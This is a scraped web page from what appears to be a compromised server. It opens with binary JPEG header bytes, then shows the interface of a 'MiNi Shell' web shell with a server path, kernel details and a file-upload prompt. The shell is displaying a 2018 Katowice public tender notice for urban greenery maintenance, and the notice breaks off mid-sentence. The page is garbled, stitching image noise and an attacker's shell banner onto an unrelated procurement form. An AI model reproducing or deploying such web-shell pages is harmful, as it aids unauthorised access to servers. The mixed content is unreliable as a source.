JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20180403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20180403/539272-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 539272-N-2018 z dnia 2018-04-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zakład Zieleni Miejskiej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Pielęgnacja zieleni niskiej i wysokiej oraz wykonywanie prac interwencyjnych na terenach miejskich i w pasach drogowych miasta Katowice w 2018 roku"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zakład Zieleni Miejskiej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">3545711101122</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Tadeusza Kościuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">138</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">40523 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Katowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 515 186</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zzm_katowice@pro.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">322 515 081</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">bip.katowice.eu/jednostki/zzm</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">bip.katowice.eu/jednostki/zzm</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.katowice.eu/jednostki/zzm</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">osobiscie lub pocztą</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Zakład Zieleni Miejskiej 40-523 Katowice ul. Kosciuszki 138 </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Pielęgnacja zieleni niskiej i wysokiej oraz wykonywanie prac interwencyjnych na terenach miejskich i w pasach drogowych miasta Katowice w 2018 roku"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">NZI.261.8.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">maksymalnej liczby części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci">2</span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem niniejszego zamówienia są usługi w zakresie wycinki i pielęgnacji drzew oraz krzewów, utrzymania zieleni, czystości w pasach drogowych i terenach miejskich w ramach prac interwencyjnych na terenie miasta Katowice w 2018 roku.2.	Zamawiający podzielił zamówienie na cztery części.3.	Opis przedmiotu zamówienia określają załączniki:1)	Załącznik nr 1 do SIWZ - Część I - Pielęgnacja zieleni niskiej i wysokiej na terenie miasta Katowice w 2018 roku (obejmująca: wycinkę i pielęgnację drzew i krzewów, nasadzenia zastępcze, również w pasach drogowych miasta)2)	Załącznik nr 2 do SIWZ - Część II - Wykonywanie prac interwencyjnych na terenach miejskich w 2018 roku,3)	Załącznik nr 3 do SIWZ - Część III - Wykonywanie prac interwencyjnych w pasach drogowych w 2018 roku,4)	Załącznik nr 4 do SIWZ - Część IV - Usunięcie darni i chwastów z chodników w 2018 roku. Każda z usług w ramach Części I - IV będzie zlecana oddzielnie zgodnie z potrzebami Zamawiającego. Prognozowana ilość jednostek jest wielkością orientacyjną i może uleć zmianie, z tego tytułu nie przysługuje Wykonawcy roszczenie odszkodowawcze.4. Zamawiający dopuszcza składanie ofert częściowych. Każda część stanowi odrębny przedmiot zamówienia i będzie podlegać odrębnej procedurze związanej z wyborem oferty. Wykonawca może złożyć maksymalnie dwie oferty na wybrane przez siebie części.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">77300000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77310000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77311000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77314100-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77312100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90000000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90600000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90512000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90511300-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-12-20</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-12-20</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin wykonania przedmiotu zamówienia: od dnia podpisania umowy do 20.12.2018 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania maksymalnej kwoty przeznaczonej na realizację umowy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Części I - IV:Wykonawca spełni ten warunek, jeżeli wykaże, że posiada zezwolenie na transport (wywóz) odpadów bądź wpis do ewidencji firm transportujących odpady, wynikające z ustawy o odpadach (Dz.U. z 2018 r. poz. 21 z późn. zm.). Zezwolenie na transport musi być wystawione na Wykonawcę.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi być spełniony min. przez jednego z nich.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Części I - IV:Wykonawca spełni ten warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę min. 100.000,00 PLN.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi być spełniony min. przez jednego z nich.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">A. Część Ia) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usługi, w ramach których wykonano wycinkę i pielęgnację drzew (w tym jedna na terenach zieleni zabytkowej), sadzenie drzew i krzewów - o wartości łącznie co najmniej 100 000,00 zł brutto.b) zdolność techniczna - wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował następującym wyposażeniem w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami:o pilarkami spalinowymi w ilości minimum 4 szt.,o frezarką do pni - w ilości minimum 1 szt.,o rębakiem do zrębkowania gałęzi i konarów - w ilości 1 szt.,o środkami transportowymi do wywozu odpadów - 2 szt. (pojazdy o ładowności od 700 kg do 3,5 t lub większej) *o urządzeniem zabezpieczenia ruchu drogowego - tablica zamykająca ,,U-26a" ze strzałą ,,22" lampową halogenową lub LED: wolnostojącą lub na pojazdy i przyczepy 1szt. * Wszystkie pojazdy muszą spełniać normę emisji spalin co najmniej EURO 4.c) kwalifikacje zawodowe i uprawnienia osób skierowanych przez Wykonawcę do realizacji zamówienia - Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej 10 osobami, w tym: jedną osobę posiadającą kwalifikacje do kierowania pracami konserwatorskimi na terenach wpisanych do rejestru zabytków polegającymi na zabezpieczeniu, uzupełnianiu, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej, jedną osobę o wykształceniu ogrodniczym lub pokrewnym, cztery osoby o uprawnieniach pilarza, w tym co najmniej dwie uprawnione do pracy na wysokości, czterech pracowników fizycznych oraz co najmniej dwie osoby posiadające uprawnienia do kierowania ruchem drogowym dla osób wykonujących roboty przy drodze.B. Część II a) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 usługi: jedną obejmująca zewnętrzne prace porządkowo - czystościowe, a drugą polegającą na pielęgnacji zieleni o wartości łącznie co najmniej 100 000,00 zł brutto. b) zdolność techniczna - Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował następującym wyposażeniem w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami:o ciągnikiem wraz z kosiarką bijakową - w ilości minimum 2 szt.,o kosami spalinowymi - w ilości minimum 6 szt.,o kosiarkami mechanicznymi (spalinowe samojezdne) - w ilości minimum 6 szt.,o pilarkami spalinowymi - w ilości minimum 2 szt.o środkami transportowymi do wywozu traw i odpadów - 4 szt. (pojazdy o ładowności od 700 kg do 3,5 t lub większej) *,o beczkowozem do podlewania 1 szt.,o opryskiwaczem ręcznym 4 szt.,o rębakiem do gałęzi 1 szt.,o urządzeniem zabezpieczenia ruchu drogowego - tablica zamykająca ,,U-26a" ze strzałą ,,22" lampową halogenową lub LED: wolnostojącą lub na pojazdy i przyczepy 1szt. * Wszystkie pojazdy muszą spełniać normę emisji spalin co najmniej EURO 4.	c) kwalifikacje zawodowe i uprawnienia osób skierowanych przez Wykonawcę do realizacji zamówienia - Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej 10 osobami, w tym: dwie osoby o wykształceniu ogrodniczym lub pokrewnym z min 3 letnim stażem pracy przy pracach związanych z pielęgnacją drzew, karczowaniem zagajników i zakładaniem trawników (w usługach ogrodniczych) i innymi czynnościami wskazanymi w opisie przedmiotu zamówienia, co najmniej dwie osoby posiadające uprawnienia do kierowania ruchem drogowym dla osób wykonujących roboty przy drodze, jeden pracownik z ukończonym kursem, szkoleniem lub szkołą w zakresie stosowania środków ochrony roślin, dwie osoby z uprawnieniami pilarza, trzech pracowników fizycznych.C. Część IIIa) zdolność zawodowa - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 usługi polegające na wykonaniu zewnętrznych prac porządkowo-czystościowych i koszenia traw o wartości łącznie co najmniej 100.000 zł brutto.b) zdolność techniczna - Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował następującym wyposażeniem w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami:o ciągnik wraz z kosiarką bijakową - w ilości minimum 2 szt.,o kosy spalinowe - w ilości minimum 6 szt.,o pilarki spalinowe - w ilości minimum 2 szt.,o środki transportowe do wywozu traw i odpadów - minimalna ilość 4 szt., (w tym: jeden pojazd o ładowności od 5 t do 15 t i trzy pojazdy (dostawcze) o 